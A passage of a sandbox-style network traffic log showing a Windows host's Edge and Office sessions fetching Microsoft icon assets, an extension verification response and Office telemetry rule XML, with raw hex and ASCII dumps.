                                                                                                                                                      2024-12-04 12:58:27 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      18192.168.2.44977613.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC536INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 2229
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                      ETag: 0x8DBD59359A9E77B
                                                                                                                                                      x-ms-request-id: d893de37-501e-0056-2de8-458077000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bd77mkmhC1EWR5efc00000001h0000000005cev
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:27 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      19192.168.2.44977413.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:27 UTC425OUTGET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:27 UTC536INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:27 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 1154
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT
                                                                                                                                                      ETag: 0x8DBD5935D5B3965
                                                                                                                                                      x-ms-request-id: dc12cdcd-501e-005d-71e8-459803000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125827Z-1746fd949bd2cq7chC1EWRnx9g00000000y0000000003exq
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:27 UTC1154INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      20192.168.2.44977813.107.246.384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:29 UTC431OUTGET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1
                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:30 UTC536INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:29 GMT
                                                                                                                                                      Content-Type: image/png
                                                                                                                                                      Content-Length: 1468
                                                                                                                                                      Connection: close
                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT
                                                                                                                                                      ETag: 0x8DBDCB5E23DFC43
                                                                                                                                                      x-ms-request-id: 014ffb60-d01e-004c-08e8-45af18000000
                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                      x-azure-ref: 20241204T125829Z-1746fd949bdjzh7thC1EWR3g6400000001bg000000002gu9
                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:30 UTC1468INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6
                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      21192.168.2.449784142.251.40.1384438080C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:42 UTC448OUTPOST /chromewebstore/v1.1/items/verify HTTP/1.1
                                                                                                                                                      Host: www.googleapis.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Content-Length: 119
                                                                                                                                                      Content-Type: application/json
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                      2024-12-04 12:58:42 UTC119OUTData Raw: 7b 22 68 61 73 68 22 3a 22 35 34 35 65 47 2f 74 5a 38 43 46 42 63 79 6f 49 68 6d 72 6e 30 30 72 4a 67 63 42 34 68 6b 39 2b 33 4d 41 7a 4b 37 6c 50 73 61 55 3d 22 2c 22 69 64 73 22 3a 5b 22 67 68 62 6d 6e 6e 6a 6f 6f 65 6b 70 6d 6f 65 63 6e 6e 6e 69 6c 6e 6e 62 64 6c 6f 6c 68 6b 68 69 22 5d 2c 22 70 72 6f 74 6f 63 6f 6c 5f 76 65 72 73 69 6f 6e 22 3a 31 7d
                                                                                                                                                      Data Ascii: {"hash":"545eG/tZ8CFBcyoIhmrn00rJgcB4hk9+3MAzK7lPsaU=","ids":["ghbmnnjooekpmoecnnnilnnbdlolhkhi"],"protocol_version":1}
                                                                                                                                                      2024-12-04 12:58:42 UTC341INHTTP/1.1 200 OK
                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                      Vary: Origin
                                                                                                                                                      Vary: X-Origin
                                                                                                                                                      Vary: Referer
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:42 GMT
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 483
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-04 12:58:42 UTC483INData Raw: 7b 0a 20 20 22 70 72 6f 74 6f 63 6f 6c 5f 76 65 72 73 69 6f 6e 22 3a 20 31 2c 0a 20 20 22 73 69 67 6e 61 74 75 72 65 22 3a 20 22 48 6a 74 32 77 55 51 2f 43 48 58 65 57 39 57 49 57 35 30 31 49 57 55 75 78 73 33 4c 6f 45 49 51 31 72 51 4a 61 50 75 63 45 2b 52 5a 4e 4c 73 39 6d 6c 53 6e 67 74 32 6d 46 55 66 6f 2b 43 4a 46 50 59 71 6f 4b 72 39 65 47 64 69 4f 6b 34 64 73 4f 6f 44 6d 66 57 50 35 4c 77 79 58 66 75 2b 74 56 50 77 45 44 59 70 6e 4a 4c 61 75 72 37 4c 63 74 52 76 63 58 38 41 6e 33 68 52 48 70 47 6b 45 4a 51 48 35 69 4e 71 7a 59 4a 6f 66 77 7a 62 68 6e 72 4d 48 6d 59 76 77 42 6d 59 5a 56 74 31 5a 74 34 45 2b 78 48 6a 4c 34 67 68 49 49 73 57 30 69 45 42 41 59 62 70 72 78 4c 66 7a 55 64 47 47 71 43 4a 6e 53 4c 54 70 69 54 30 74 32 4e 63 32 33 58 41 32
                                                                                                                                                      Data Ascii: { "protocol_version": 1, "signature": "Hjt2wUQ/CHXeW9WIW501IWUuxs3LoEIQ1rQJaPucE+RZNLs9mlSngt2mFUfo+CJFPYqoKr9eGdiOk4dsOoDmfWP5LwyXfu+tVPwEDYpnJLaur7LctRvcX8An3hRHpGkEJQH5iNqzYJofwzbhnrMHmYvwBmYZVt1Zt4E+xHjL4ghIIsW0iEBAYbprxLfzUdGGqCJnSLTpiT0t2Nc23XA2


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      22192.168.2.44978613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:58:58 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:58:58 UTC471INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:58:58 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 218853
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public
                                                                                                                                                      Last-Modified: Tue, 03 Dec 2024 18:21:00 GMT
                                                                                                                                                      ETag: "0x8DD13C73D7EC056"
                                                                                                                                                      x-ms-request-id: 85afd668-301e-0052-47c3-4565d6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125858Z-1746fd949bd6zq92hC1EWRry48000000019g000000001q73
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:58:58 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                      2024-12-04 12:58:58 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                      2024-12-04 12:58:59 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
